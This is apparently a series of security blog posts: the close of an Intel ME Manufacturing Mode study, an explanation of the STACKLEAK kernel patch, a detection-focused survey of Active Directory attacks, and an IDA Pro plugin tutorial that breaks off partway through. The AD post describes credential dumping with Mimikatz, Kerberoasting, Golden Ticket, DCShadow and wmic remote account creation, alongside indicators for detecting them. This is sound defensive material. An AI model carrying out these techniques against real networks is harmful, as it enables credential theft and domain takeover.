We also created a program [7] for checking the status of Manufacturing Mode if the user for whatever reason does not have access to Intel ME System Tools. Here is what the script shows on affected systems:

Figure 10. mmdetect script
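Conceptually, such a check boils down to reading the FWSTS register from the MEI controller's PCI configuration space and testing the fourth bit. A minimal sketch for Linux (the device address 00:16.0 and the 0x40 register offset are assumptions that hold for typical desktop platforms; run as root):

#include <cstdint>
#include <cstdio>
#include <fstream>

int main()
{
    std::ifstream cfg("/sys/bus/pci/devices/0000:00:16.0/config", std::ios::binary);
    if (!cfg) { std::puts("MEI PCI device not found"); return 1; }

    uint32_t fwsts = 0;
    cfg.seekg(0x40);                                  // FWSTS (HFS) register
    cfg.read(reinterpret_cast<char *>(&fwsts), sizeof(fwsts));

    std::printf("FWSTS = 0x%08x, Manufacturing Mode: %s\n",
                fwsts, (fwsts & (1u << 4)) ? "ENABLED" : "disabled");
    return 0;
}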
So one logical question is, how can users close Manufacturing Mode themselves if the manufacturer has failed to do so? To disable Manufacturing Mode, FPT has a special option (-CLOSEMNF) that in addition to its main purpose also allows setting the recommended access rights for SPI flash regions in the descriptor.

Here is what happens when we enter -CLOSEMNF:

Figure 11. Process of closing Manufacturing Mode with FPT

In this example, we used the NO parameter for -CLOSEMNF to avoid resetting the platform, as would otherwise happen by default immediately after closing Manufacturing Mode.

Conclusion

Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even "bricking" of hardware.
We also suspect that the ability to reset ME without resetting the main CPU may lead to additional security issues, because the states of the BIOS/UEFI and ME fall out of sync.

[1] Intel Management Engine Critical Firmware Update, Intel-SA-00086
[2] GitHub - chipsec/chipsec: Platform Security Assessment Framework
[4] Fast, secure and flexible OpenSource firmware, Coreboot
[5] Mark Ermolov, Maxim Goryachy, How to Become the Sole Owner of Your PC, PHDays VI, 2016
[6] Mark Ermolov, Maxim Goryachy, Disabling Intel ME 11 via undocumented mode, Positive Technologies blog
[7] Intel ME Manufacturing Mode Detection Tools
[8] Alexander Ermolov, Safeguarding rootkits: Intel BootGuard
[9] Dmitry Sklyarov, Intel ME: Flash File System Explained

Authors: Maxim Goryachy, Mark Ermolov

How STACKLEAK improves Linux kernel security




STACKLEAK is a Linux kernel security feature initially developed by Grsecurity/PaX. I'm working on introducing STACKLEAK into the Linux kernel mainline. This article describes the inner workings of this security feature and why the vanilla kernel needs it.

In short, STACKLEAK is needed because it mitigates several types of Linux kernel vulnerabilities, by:

  •  Reducing the information that can be revealed to an attacker by kernel stack leak bugs,
  •  Blocking some uninitialized stack variable attacks,
  •  Detecting kernel stack overflow during a Stack Clash attack against the Linux kernel.

This security feature fits the mission of the Kernel Self Protection Project (KSPP): security is more than just fixing bugs. Fixing absolutely all bugs is impossible, which is why the Linux kernel has to fail safely in case of an error or vulnerability exploitation. More details about KSPP are available on its wiki.

STACKLEAK was initially developed by the PaX Team, going by the name PAX_MEMORY_STACKLEAK in the Grsecurity/PaX patch. But this patch is no longer freely available to the Linux kernel community. So I took its last public version, for the 4.9 kernel (April 2017), and got to work. The plan has been as follows:

  • First extract STACKLEAK from the Grsecurity/PaX patch.
  • Then carefully study the code and create a new patch.
  • Send the result to the Linux kernel mailing list (LKML), get feedback, make improvements, and repeat until the code is accepted into the mainline.

As of October 9, 2018, the 15th version of the STACKLEAK patch series has been submitted. It contains the common code and x86_64/x86_32 support. The arm64 support developed by Laura Abbott from Red Hat has already been merged into mainline kernel v4.19.


Security features


Most importantly, STACKLEAK erases the kernel stack at the end of syscalls. This reduces the information that can be revealed through some kernel stack leak bugs. An example of such an information leak is shown in Figure 1.

Figure 1. Kernel stack leak exploitation, pre-STACKLEAK
However, these leaks become useless for the attacker if the used part of the kernel stack is filled by some fixed value at the end of a syscall (Figure 2).

Figure 2. Kernel stack leak exploitation, post-STACKLEAK
Hence, STACKLEAK blocks exploitation of some uninitialized kernel stack variable vulnerabilities, such as CVE-2010-2963 and CVE-2017-17712. For a description of exploitation of vulnerability CVE-2010-2963, refer to the article by Kees Cook.

Figure 3 illustrates an attack on an uninitialized kernel stack variable.

Figure 3. Uninitialized kernel stack variable exploitation, pre-STACKLEAK
STACKLEAK mitigates this type of attack because at the end of a syscall, it fills the kernel stack with a value that points to an unused hole in the virtual memory map (Figure 4).

Figure 4. Uninitialized kernel stack variable exploitation, post-STACKLEAK

There is an important limitation: STACKLEAK does not help against similar attacks performed during a single syscall.

Runtime detection of kernel stack depth overflow


In the mainline kernel, STACKLEAK would be effective against kernel stack depth overflow only in combination with CONFIG_THREAD_INFO_IN_TASK and CONFIG_VMAP_STACK (both introduced by Andy Lutomirski).

The simplest type of stack depth overflow exploit is shown in Figure 5.

Figure 5. Stack depth overflow exploitation: mitigation with CONFIG_THREAD_INFO_IN_TASK
Overwriting the thread_info structure at the bottom of the kernel stack allows an attacker to escalate privileges on the system. However, CONFIG_THREAD_INFO_IN_TASK moves thread_info out of the thread stack and therefore mitigates such an attack.

There is a more complex variant of the attack: make the kernel stack grow beyond the end of the kernel's preallocated stack space and overwrite security-sensitive data in a neighboring memory region (Figure 6). More technical details are available in:


Figure 6. Stack depth overflow exploitation: a more complicated version

CONFIG_VMAP_STACK protects against such attacks by placing a special guard page next to the kernel stack (Figure 7). If accessed, the guard page triggers an exception.

Figure 7. Stack depth overflow exploitation: mitigation with guard pages
Finally, the most interesting version of a stack depth overflow attack is a Stack Clash (Figure 8). Gael Delalleau published this idea in 2005; it was later revisited by the Qualys Research Team in 2017. In essence, it is possible to jump over a guard page and overwrite data in a neighboring memory region using Variable Length Arrays (VLAs).


Figure 8. Stack Clash attack
STACKLEAK mitigates Stack Clash attacks against the kernel stack. More information about STACKLEAK and Stack Clash is available on the grsecurity blog.

To prevent a Stack Clash in the kernel stack, a stack depth overflow check is performed before each alloca() call. This is the code from v14 of the patch series:

void __used stackleak_check_alloca(unsigned long size)
{
       unsigned long sp = (unsigned long)&sp;
       struct stack_info stack_info = {0};
       unsigned long visit_mask = 0;
       unsigned long stack_left;

       BUG_ON(get_stack_info(&sp, current, &stack_info, &visit_mask));

       stack_left = sp - (unsigned long)stack_info.begin;

       if (size >= stack_left) {
               /*
                * Kernel stack depth overflow is detected, let's report that.
                * If CONFIG_VMAP_STACK is enabled, we can safely use BUG().
                * If CONFIG_VMAP_STACK is disabled, BUG() handling can corrupt
                * the neighbour memory. CONFIG_SCHED_STACK_END_CHECK calls
                * panic() in a similar situation, so let's do the same if that
                * option is on. Otherwise just use BUG() and hope for the best.
                */
#if !defined(CONFIG_VMAP_STACK) && defined(CONFIG_SCHED_STACK_END_CHECK)
               panic("alloca() over the kernel stack boundary\n");
#else
               BUG();
#endif
       }
}

However, this functionality was excluded from the 15th version of the STACKLEAK patch series. The main reason is that Linus Torvalds has forbidden use of BUG_ON() in kernel hardening patches. Moreover, during discussion of the 9th version, the maintainers decided to remove all VLAs from the mainline kernel. There are 15 kernel developers participating in that work, which will be finished soon.

Performance impact


Cursory performance testing was performed on x86_64 hardware: Intel Core i7-4770, 16 GB RAM.

Test 1, looking good: compiling the Linux kernel on one CPU core.

    # time make
    Result on 4.18:
        real 12m14.124s
        user 11m17.565s
        sys 1m6.943s
    Result on 4.18+stackleak:
        real 12m20.335s (+0.85%)
        user 11m23.283s
        sys 1m8.221s

Test 2, not so hot:

    # hackbench -s 4096 -l 2000 -g 15 -f 25 -P
    Average on 4.18: 9.08 s
    Average on 4.18+stackleak: 9.47 s (+4.3%)

In summary: the performance penalty varies for different workloads. Test STACKLEAK on your expected workload before deploying it in production.

Inner workings


STACKLEAK consists of:

  • The code that erases the kernel stack at the end of syscalls,
  • The GCC plugin for kernel compile-time instrumentation.

Erasing the kernel stack is performed in the stackleak_erase() function. This function runs before returning from a syscall to userspace and writes STACKLEAK_POISON (-0xBEEF) to the used part of the thread stack (Figure 10). For speed, stackleak_erase() uses the lowest_stack variable as a starting point (Figure 9). This variable is regularly updated in stackleak_track_stack() during system calls.

Figure 9. Erasing the kernel stack with stackleak_erase()
Figure 10. Erasing the kernel stack with stackleak_erase(), continued
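The idea of the erase pass can be conveyed with a toy userspace sketch (an illustration of the concept, not the kernel code): walk from the deepest point the stack reached up to the current stack pointer and overwrite everything with the poison value.

#include <cstdint>

static const unsigned long STACKLEAK_POISON = -0xBEEFUL; // 0xFFFFFFFFFFFF4111 on x86_64

// lowest: deepest (lowest) address the stack reached during the syscall;
// sp: current stack pointer; the stack grows down, so [lowest, sp) was used
void erase_used_stack(unsigned long *lowest, unsigned long *sp)
{
    for (unsigned long *p = lowest; p < sp; ++p)
        *p = STACKLEAK_POISON;
}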
Kernel compile-time instrumentation is handled by the STACKLEAK GCC plugin. GCC plugins are compiler-loadable modules that can be project-specific. They register new compilation passes via the GCC Pass Manager and provide the callbacks for these passes.

So the STACKLEAK GCC plugin inserts the aforementioned stackleak_track_stack() calls for the functions with a large stack frame. It also inserts the stackleak_check_alloca() call before alloca and the stackleak_track_stack() call after it.

As I already mentioned, inserting stackleak_check_alloca() was dropped in the 15th version of the STACKLEAK patch series.

The way to the mainline


The path of STACKLEAK to the Linux kernel mainline is very long and complicated (Figure 11).

Figure 11. The way to the mainline
In April 2017, the authors of grsecurity made their patches commercial. In May 2017, I decided to work on upstreaming STACKLEAK. It was the beginning of a very long story. My employer Positive Technologies allows me to spend a part of my working time on this task, although I mainly spend my free time on it.

As of October 9, 2018, the 15th version of the STACKLEAK patch series is contained in the linux-next branch. It fits Linus' requirements and is ready for the merge window of the 4.20/5.0 kernel release.

Conclusion


STACKLEAK is a very useful Linux kernel self-protection feature that mitigates several types of vulnerabilities. Moreover, the PaX Team has made it rather fast and technically beautiful. Considering the substantial work done in this direction, upstreaming STACKLEAK would benefit Linux users with high information security requirements and also focus the attention of the Linux developer community on kernel self-protection.

Author: Alexander Popov, Positive Technologies


Advanced attacks on Microsoft Active Directory: detection and mitigation

Attacks on Microsoft Active Directory have been a recurrent topic of talks at Black Hat and DEF CON over the last four years. Speakers describe new vectors, share their inventions, and give recommendations on detection and prevention. I believe that the IT department is capable of creating a secure infrastructure, which the security department can then monitor. High-quality monitoring, in its turn, requires good tools. That's like a military base: you have erected guard towers around the perimeter but still keep watch over the area.

Six techniques that will not go unnoticed

Numerous vendors provide security software that supports monitoring of the following malicious activities:

Pass-the-Hash

This attack is made possible by the architecture of the NTLM authentication protocol, created by Microsoft in the 1990s. Logging in to a remote host requires only the password hash, which is stored on the computer used for authentication. Therefore, the hash can be extracted from that computer.

Mimikatz

To achieve that, French researcher Benjamin Delpy developed Mimikatz, a utility that allows dumping cleartext passwords and NTLM hashes from computer memory.

Brute Force

If credentials extracted from one host are not enough, the attacker can opt for a rough but effective technique of guessing the password.

net user /domain

Where can the attacker get a username dictionary for this attack? Any domain member is allowed to execute the net user /domain command, which returns a full list of AD domain users.

Kerberoasting

If a domain uses Kerberos as the authentication protocol, an attacker can try a Kerberoasting attack. Any user authenticated on the domain can request a Kerberos service ticket (TGS, Ticket Granting Service ticket) for access to a service. A TGS is encrypted with the password hash of the account used to run the service. The attacker who requested the TGS can bruteforce it offline without any fear of being blocked. In case of success, the attacker gains the password to the account associated with the service, which is usually a privileged one.

PsExec

As soon as the attacker obtains the required credentials, the next task is remote command execution. This task can be easily solved using the PsExec utility from the Sysinternals set, which proved remarkably effective and is appreciated by both IT administrators and hackers.

Seven spells of hackers

Now we are going to review seven hacker "spells" that can help gain full control over Active Directory.

[The figure shows four steps of the attack. Each step features a set of methods]


Let's start with reconnaissance.

PowerView

PowerView is part of PowerSploit, a well-known PowerShell framework for penetration testing. PowerView supports BloodHound, a tool that gives a graph representation of object connections in AD.


Graph representation of relationships between Active Directory objects
Bloodhound immediately provides such possibilities as:

  • Finding accounts of all domain administrators
  • Finding hosts, on which domain administrators are logged
  • Finding the shortest path from the attacker's host to the host with the domain admin session

The last capability answers the question of which hosts need to be hacked to reach the domain admin account. This approach significantly reduces the time required to gain full control over the domain.

The difference between PowerView and built-in utilities that provide data on AD objects (such as net.exe) is that PowerView uses LDAP, not SAMR. To detect this activity, we can use domain controller event 1644. Logging of this event is enabled by adding the relevant value in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics\15 Field Engineering = 5


Enabling logging of LDAP event 1644
Event 1644 with properties of an LDAP query
Note that there can be multiple events of this kind, and a good alternative to analysis of events is analysis of traffic, because LDAP is a cleartext protocol and all queries are seen clearly in traffic.

LDAP SearchRequest
One more feature of the framework is that it uses only PowerShell and has no dependencies. Moreover, PowerShell v5 has a new advanced audit option, which is very useful for detection: event 4104 shows the script body, which can be searched for function names specific to PowerView.

SPN Scan

This technique can be a substitute for Nmap. As soon as a hacker knows which users and groups exist in AD, he or she needs information about services to get the whole picture.

Commonly, scanning ports with Nmap provides this information. But these data can also be retrieved from AD, where they are already stored. The query result looks as follows: the reply returns an SPN (Service Principal Name), which consists of a service class (unique for each service type), the host name in FQDN format, and, for some services, a port.

Examples of SPN for different services
For the full list of SPNs, see https://adsecurity.org/?page_id=183

To detect SPN Scan, audit of LDAP events can be used.

SPN Scan has a clear advantage over Nmap: it is less noisy. With Nmap, you need to connect to each host and send packets to the range of ports you specify, whereas the SPN list is obtained with a single query.

Remote Sessions Enumeration

During the phase called lateral movement, an important task is to match users with the computers they are logged on to: the attacker either already has user credentials (a hash or a Kerberos ticket) and searches for hosts to log in to flawlessly, or searches for a host with a domain administrator session.

Both cases trigger the following scenario: hunt -> compromise any host -> upload Mimikatz -> profit.

To detect the use of this scenario, two events can be used: 4624, a successful logon to a remote system (logon type 3), and access to the network share IPC$, with one nuance: the accessed resource is the named pipe srvsvc. Why the pipe is named this way can be guessed from the traffic.


The red boxes in the left part show SMB connections, followed by connections to the pipe srvsvc. This pipe allows interaction via the Server Service Remote Protocol. End hosts serve various administrative information over the pipe; for example, one of the requests is NetSessEnum, which returns a full list of users logged in to the remote system, with their IP addresses and names.


MaxPatrol SIEM allows detection based on correlation of these two events with srvsvc taken into account. PT Network Attack Discovery performs similar detection based on traffic analysis.

Overpass-the-Hash

A reincarnation of Pass-the-Hash. Let's continue with lateral movement. What can an attacker do with an NTLM hash on hand? Conduct a Pass-the-Hash attack. But that attack is already well known and can be detected. Therefore, a new attack vector was found: Overpass-the-Hash.

The Kerberos protocol was developed specifically to prevent sending user passwords over the network in any form. To that end, the user's computer encrypts an authentication request with the user's password hash. A Key Distribution Center (a special service running on the domain controller) replies with a ticket for obtaining other tickets, the so-called Ticket-Granting Ticket (TGT). The client is now deemed authenticated and can request tickets for access to other services within the next 10 hours. Therefore, if the attacker dumps the hash of a user who is a member of a group trusted by the target service (for example, an ERP system or a database), the attacker can issue a ticket for himself and successfully log in to the target service.



How to detect

If a hacker uses the PowerShell version of Mimikatz for an attack, logging the script body would help, because Invoke-Mimikatz is quite an indicative line.


Another symptom is event 4688, creation of a process with extended command-line auditing. Even if the binary file is renamed, the command line will contain the command, which is very characteristic of Mimikatz.


If you want to detect an Overpass-the-Hash attack by analyzing traffic, the following anomaly can be used: Microsoft recommends AES256 encryption for authentication requests in modern domains, whereas Mimikatz encrypts authentication request data with the outdated ARCFOUR (RC4) cipher.


Another specific feature is the cipher suite sent by Mimikatz, which is different from a legitimate domain's suite, and thus stands out in the traffic.
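A toy sketch of this traffic heuristic (the etype numbers, 23 for rc4-hmac and 18 for aes256-cts-hmac-sha1-96, come from the Kerberos RFCs; the rest is illustrative):

#include <vector>

// Flag a Kerberos authentication request that offers RC4 but not AES256,
// which is anomalous in a domain where AES256 is the norm.
bool suspicious_etypes(const std::vector<int> &etypes)
{
    bool rc4 = false, aes256 = false;
    for (int e : etypes) {
        if (e == 23) rc4 = true;        // rc4-hmac (ARCFOUR)
        if (e == 18) aes256 = true;     // aes256-cts-hmac-sha1-96
    }
    return rc4 && !aes256;
}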

Golden Ticket

A well-known method.

What can an attacker get out of the password hash of a special account called krbtgt? Previously, we reviewed a case where the account could be unprivileged. Now we review a case where this account's password hash is used for signing absolutely all tickets for obtaining other tickets (TGTs). There is no need to contact a Key Distribution Center: an attacker can generate such a ticket on his own, because a Golden Ticket is in fact a TGT. Then the attacker can send authentication requests to any service in AD for an unlimited period. The result is unrestricted access to target resources: Golden Ticket has its name for a reason.


How to detect based on events 

Event 4768 informs that a TGT was granted, and event 4769 informs that a service ticket required for authentication on some service in AD was granted.


In this case, we can exploit a difference: a Golden Ticket does not request a TGT from the domain controller (it is generated locally), but a TGS still has to be requested. Therefore, if we see a TGS obtained without a corresponding TGT, we can assume that a Golden Ticket attack is underway.
MaxPatrol SIEM uses table lists to log all issued TGTs and TGSs to implement this method of detection.
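A toy sketch of that correlation logic (illustrative only, not MaxPatrol's implementation): remember every account for which event 4768 reported a TGT, and alert on a 4769 for an account with no TGT on record.

#include <cstdio>
#include <string>
#include <unordered_set>

struct GoldenTicketDetector {
    std::unordered_set<std::string> accounts_with_tgt;

    void on_event_4768(const std::string &account)   // TGT issued
    {
        accounts_with_tgt.insert(account);
    }

    void on_event_4769(const std::string &account)   // TGS requested
    {
        if (!accounts_with_tgt.count(account))
            std::printf("ALERT: TGS for '%s' with no recorded TGT (Golden Ticket?)\n",
                        account.c_str());
    }
};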

WMI Remote Execution

After being authenticated and authorized on target hosts, the attacker can proceed to remote execution of tasks. WMI is a built-in mechanism that fits this purpose perfectly. For the last few years, "living off the land," meaning the use of built-in Windows mechanisms, has been on trend. The main reason is that such activity mimics legitimate activity.

The figure below demonstrates the use of wmic, a built-in utility. The utility is given a host address for connection, credentials, the process call create operator, and a command to be executed on the remote host.


How to detect 

Check the combination of remote logon events 4624; an important parameter there is the Logon ID. Also check event 4688, which informs about creation of a process with its command line. Event 4688 shows that the parent of the created process is WmiPrvSE.exe, a special WMI service process used for remote administration. We can see the net user /add command sent by us, and a Logon ID that is the same as in event 4624. Thus, we can tell absolutely precisely from which host this command was initiated.


Detection based on traffic analysis


We can clearly see words typical of Win32 process create, and the command line that is going to be executed. The malware in the figure below was distributed across virtual networks in the same way as WannaCry, but instead of encrypting data, it set up a crypto miner. The malware used Mimikatz and EternalBlue: it dumped accounts and used them to log in to hosts it could reach on the network. Using WMI, the malware ran PowerShell on these hosts and downloaded a PowerShell payload, which also contained Mimikatz, EternalBlue, and a miner. Thus, a chain reaction was created.


Recommendations

  1. Use complex and long passwords (at least 25 characters) for service accounts. An attacker would not have any chance to conduct a Kerberoasting attack, because bruteforcing such passwords takes too much time.
  2. Enable PowerShell logging. This helps reveal the use of various modern tools for attacks on AD.
  3. Upgrade to Windows 10 and Windows Server 2016. Microsoft created Credential Guard, which prevents dumping of NTLM hashes and Kerberos tickets.
  4. Implement role-based access control. It is risky to assign the permissions of AD, DC, server, and workstation admins to one role.
  5. Reset the password of krbtgt (the account used for signing TGTs) twice every year and every time the AD administrator changes. It is important to change the password twice, because both the current and the previous passwords are stored. Even if a network is compromised and attackers have issued a Golden Ticket, changing the password makes that ticket useless, and they have to bruteforce the password once again.
  6. Use protection tools with a continuously updated expert database. This helps reveal ongoing attacks.

DCShadow


On January 24, 2018, Benjamin Delpy and Vincent Le Toux released, during Microsoft BlueHat in Israel, a new Mimikatz module implementing the DCShadow attack. The idea of the attack is to create a rogue domain controller in order to replicate objects in AD. The researchers defined the minimum set of Kerberos SPNs required for successful replication: only two SPNs are needed. They also showed a special function that can force replication between controllers. The authors assure that this attack can make your SIEM go blind: a rogue domain controller does not send events to SIEM, which means that attackers can do various evil tricks with AD and nobody would know about it.

The attack scheme:


Two SPNs should be added to the system the attack is run from; these SPNs are required for other domain controllers to authenticate via Kerberos for replication. Because, according to the specification, a domain controller is represented in the AD database as an object of the nTDSDSA class, such an object should be created. Finally, replication is triggered with the DRSReplicaAdd function.

How to detect 

This is what DCShadow looks like in traffic. By analyzing the traffic, we can clearly see that a new object is added to the domain controller configuration schema, and then replication is triggered.


Although the attack creators say that SIEM would not help in its detection, we found a way to inform the security department about suspicious activity on the network.

Our correlation rule has a list of legitimate domain controllers and triggers on every replication from a domain controller not included in this whitelist. The security department can then investigate whether it is a legitimate domain controller added by the IT service or a DCShadow attack.

An example of DCShadow confirms that new enterprise attack vectors appear. It is essential to stay on the crest of the wave in this ocean of information security, look ahead, and act quickly.

Every day, we at PT Expert Security Center research new threats and develop methods and tools to detect them. And we will continue sharing this information with you.

Author: Anton Tyurin, Head of Attack Detection Team, Positive Technologies


Modernizing IDA Pro: how to make processor module glitches go away




Hi there,

This is my latest article on a topic near and dear to my heart: making IDA Pro more modern and, well, better.

Those familiar with IDA Pro probably know that feeling: there are glitches in the processor modules that you use, you don't have the source code, and they are driving you crazy! Unfortunately, not all of the glitches discussed here qualify as bugs, meaning that the developers are unlikely to ever fix them—unless you fix them yourself.

Localizing the glitches

Note: In this article, I will be looking for bugs and issues in the Motorola M68000 module (which happens to be my favorite, as well as a commonly used one).

Glitch #1: Addressing relative to the PC register. Specifically, the disassembler listing for such instructions is not always correct. Check out this screenshot:


Everything seems fine at first glance. And the glitch does not even interfere with analysis. But the opcode has been disassembled incorrectly. Let's look at this in an online disassembler:


We see that our addressing should be relative to the PC register since the target address of the reference is within the signed short range.

Glitch #2: "Mirrors" for RAM and certain other regions. Since addressing on the m68k is 24-bit, all accesses to high (or low) mirror regions should be re-addressed to a single range, so that cross-references land in one place.

Glitch #3 (which is more like "missing functionality" than an actual glitch): The so-called lineA (1010) and lineF (1111) emulators. These opcodes did not make it into the main command set, so they have to be handled in a special way by interrupt vectors. The size of the opcodes depends only on the implementation in the handler. I've seen only a two-byte implementation. So we'll be adding this.

Glitch #4: The trap #N instruction does not give any cref to the trap handlers.

Glitch #5: The movea.w instruction should make a full xref to an address from a word reference, but we get only a word-sized integer.

Fixing the glitches (empty template)


To understand how to fix a particular processor module, you have to know what our abilities are in this regard, and what exactly a "fix" means.

In short: a fix is delivered in the form of a plug-in, which can be written in either Python or C++ (I chose the latter). C++ is less portable but if anyone is willing to take up the task of porting the plug-in to Python, I will be only grateful!

First we create an empty DLL project in Visual Studio: File->New->Project->Windows Desktop Wizard->Dynamic link library (.dll). Select the Empty Project checkbox and clear all the other checkboxes:


We unpack the IDA SDK and add its path to the Visual Studio macros (here I am using the 2017 version), which makes it easy to refer to later. We will also add a macro for the path to IDA Pro.

Go to View->Other Windows->Property Manager:


Since we are working with SDK version 7.0, compilation will be performed with the x64 compiler. So select Debug | x64->Microsoft.Cpp.x64.user->Properties:


In the User Macros section, click Add Macro. There we will add IDA_SDK with the path to where we unpacked the SDK:


Now we can do the same with IDA_DIR (the path being for your copy of IDA Pro):


(By default, IDA is installed in %Program Files%, which requires administrator rights.)

Let's also get rid of the Win32 configuration (this article does not cover compilation for x86 systems) and leave just x64.

Create the empty file ida_plugin.cpp, which for the moment contains no code. Now we can select the character set and other settings for C++:




Now add some includes:



And SDK libraries:



Now we drop in the code template:
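In outline, the template amounts to the following (a minimal sketch against IDA SDK 7.0; the plugin name and flag choices here are my own assumptions):

#include <ida.hpp>
#include <idp.hpp>
#include <loader.hpp>

static bool plugin_inited = false;
static int ana_addr = 0; // guards ana_insn against recursion (see below)

static ssize_t idaapi hook_idp(void *user_data, int notification_code, va_list va)
{
    switch (notification_code)
    {
    case processor_t::ev_ana_insn: /* fix/extend instruction decoding */ break;
    case processor_t::ev_emu_insn: /* add cross-references */ break;
    case processor_t::ev_out_mnem: /* output custom mnemonics */ break;
    }
    return 0; // 0 = not handled, let the processor module proceed
}

static bool init_plugin(void)
{
    return ph.id == PLFM_68K; // run only on the m68k processor module
}

static int idaapi init(void)
{
    if (!init_plugin())
        return PLUGIN_SKIP;
    hook_to_notification_point(HT_IDP, hook_idp, NULL);
    plugin_inited = true;
    return PLUGIN_KEEP;
}

static void idaapi term(void)
{
    if (plugin_inited)
        unhook_from_notification_point(HT_IDP, hook_idp, NULL);
}

static bool idaapi run(size_t) { return false; }

plugin_t PLUGIN =
{
    IDP_INTERFACE_VERSION,
    PLUGIN_PROC | PLUGIN_HIDE,
    init, term, run,
    "m68k fixer", NULL, "m68k fixer", NULL,
};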



Fixing the bugs (filling out the template)


The print_op() and print_insn() functions are needed so we can see which flags have been set by the current processor module for certain instructions. This is necessary for finding flags for available opcodes so we can use them in our fix.

The body of our "fixer" is the hook_idp() function. For our needs, we will need to implement three callbacks in it:

  1. processor_t::ev_ana_insn: this is needed if the processor module does not implement some opcodes
  2. processor_t::ev_emu_insn: here you can make cross-references to data/code to which new opcodes refer (or old ones do not refer)
  3. processor_t::ev_out_mnem: new opcodes need to get output somehow—so that's what goes on here

The init_plugin() function will stop our fixer from launching on other processor modules.
And most importantly, we hook the whole callback to processor module events:

hook_to_notification_point(HT_IDP, hook_idp, NULL);

The trick with the ana_addr global variable is necessary so that ana_insn does not get stuck in recursion when trying to get information about an instruction that we do not parse manually. This crutch has been around for a long time since early versions, and alas, doesn't seem to be going away anytime soon.

Fix for Glitch #1


Finding a solution required a lot of mucking about with the debugger output that I implemented for the purpose. I knew that in some cases, IDA successfully outputs references relative to PC (for instructions where a jump is made based on an offset table that is near the current instruction plus register index); but proper display of addressing had not been implemented for the lea instruction. Ultimately, I found one such instruction with a jump and figured out which flags are needed to make PC display properly with parentheses:

case processor_t::ev_ana_insn:
{
    insn_t *out = va_arg(va, insn_t *);

    if (ana_addr)
        break;

    ana_addr = 1;
    if (ph.ana_insn(out) <= 0)
    {
        ana_addr = 0;
        break;
    }
    ana_addr = 0;

    for (int i = 0; i < UA_MAXOP; ++i)
    {
        op_t &op = out->ops[i];

        switch (op.type)
        {
        case o_near:
        case o_mem:
        {
            if (out->itype != 0x76 || op.n != 0 ||
                (op.phrase != 0x09 && op.phrase != 0x0A) ||
                (op.addr == 0 || op.addr >= (1 << 23)) ||
                op.specflag1 != 2) // lea table(pc),Ax
                break;

            short diff = op.addr - out->ea;
            if (diff >= SHRT_MIN && diff <= SHRT_MAX)
            {
                out->Op1.type = o_displ;
                out->Op1.offb = 2;
                out->Op1.dtype = dt_dword;
                out->Op1.phrase = 0x5B;
                out->Op1.specflag1 = 0x10;
            }
        } break;
        }
    }

    return out->size;
} break;

Fix for Glitch #2


Here things are simple: we mask addresses for specific ranges, 0xFF0000-0xFFFFFF (RAM) and 0xC00000-0xC000FF (VDP video memory). The main thing is to filter by operand type, o_near and o_mem.

case processor_t::ev_ana_insn:
{
    insn_t *out = va_arg(va, insn_t *);

    if (ana_addr)
        break;

    ana_addr = 1;
    if (ph.ana_insn(out) <= 0)
    {
        ana_addr = 0;
        break;
    }
    ana_addr = 0;

    for (int i = 0; i < UA_MAXOP; ++i)
    {
        op_t &op = out->ops[i];

        switch (op.type)
        {
        case o_near:
        case o_mem:
        {
            op.addr &= 0xFFFFFF; // for any mirrors

            if ((op.addr & 0xE00000) == 0xE00000) // RAM mirrors
                op.addr |= 0x1F0000;

            if ((op.addr >= 0xC00000 && op.addr <= 0xC0001F) ||
                (op.addr >= 0xC00020 && op.addr <= 0xC0003F)) // VDP mirrors
                op.addr &= 0xC000FF;
        } break;
        }
    }

    return out->size;
} break;

Fix for Glitch #3


To add the opcodes, what we need to do is:

1. Define indexes for the new opcodes. All new indexes should start from CUSTOM_INSN_ITYPE:

enum m68k_insn_type_t
{
    M68K_linea = CUSTOM_INSN_ITYPE,
    M68K_linef,
};

2. The lineA/lineF opcodes trigger when the bytes 0xA0/0xF0 are encountered in the code. So we read one byte.

3. Get a reference to the handler vector. In my case, the interrupt vectors are located in the first 64 dwords of the header; the lineA/lineF handlers are at positions 0x0A and 0x0B:

value = get_dword(0x0A * sizeof(uint32));
// ...
value = get_dword(0x0B * sizeof(uint32));

4. In ev_emu_insn, we add cross-references for the handlers and for the following instruction, so as not to interrupt the code flow:

insn->add_cref(insn->Op1.addr, 0, fl_CN); // code ref
insn->add_cref(insn->ea + insn->size, insn->Op1.offb, fl_F); // flow ref

5. In ev_out_mnem, we output our custom mnemonic:

const char *mnem = (outbuffer->insn.itype == M68K_linef) ? "line_f" : "line_a";
outbuffer->out_custom_mnem(mnem);


Putting it all together:

enum m68k_insn_type_t
{
    M68K_linea = CUSTOM_INSN_ITYPE,
    M68K_linef,
}; /* after includes */

case processor_t::ev_ana_insn:
{
    insn_t *out = va_arg(va, insn_t *);

    if (ana_addr)
        break;

    uint16 itype = 0;
    ea_t value = out->ea;
    uchar b = get_byte(out->ea);

    if (b == 0xA0 || b == 0xF0)
    {
        switch (b)
        {
        case 0xA0:
            itype = M68K_linea;
            value = get_dword(0x0A * sizeof(uint32));
            break;
        case 0xF0:
            itype = M68K_linef;
            value = get_dword(0x0B * sizeof(uint32));
            break;
        }

        out->itype = itype;
        out->size = 2;

        out->Op1.type = o_near;
        out->Op1.offb = 1;
        out->Op1.dtype = dt_dword;
        out->Op1.addr = value;
        out->Op1.phrase = 0x0A;
        out->Op1.specflag1 = 2;

        out->Op2.type = o_imm;
        out->Op2.offb = 1;
        out->Op2.dtype = dt_byte;
        out->Op2.value = get_byte(out->ea + 1);
    }

    return out->size;
} break;

case processor_t::ev_emu_insn:
{
    const insn_t *insn = va_arg(va, const insn_t *);

    if (insn->itype == M68K_linea || insn->itype == M68K_linef)
    {
        insn->add_cref(insn->Op1.addr, 0, fl_CN);
        insn->add_cref(insn->ea + insn->size, insn->Op1.offb, fl_F);
        return 1;
    }
} break;

case processor_t::ev_out_mnem:
{
    outctx_t *outbuffer = va_arg(va, outctx_t *);

    if (outbuffer->insn.itype != M68K_linea && outbuffer->insn.itype != M68K_linef)
        break;

    const char *mnem = (outbuffer->insn.itype == M68K_linef) ? "line_f" : "line_a";
    outbuffer->out_custom_mnem(mnem);
    return 1;
} break;

Fix for Glitch #4

Find the opcode for the trap instruction, get the index from the instruction, and take the handler vector at that index. The result resembles the following:
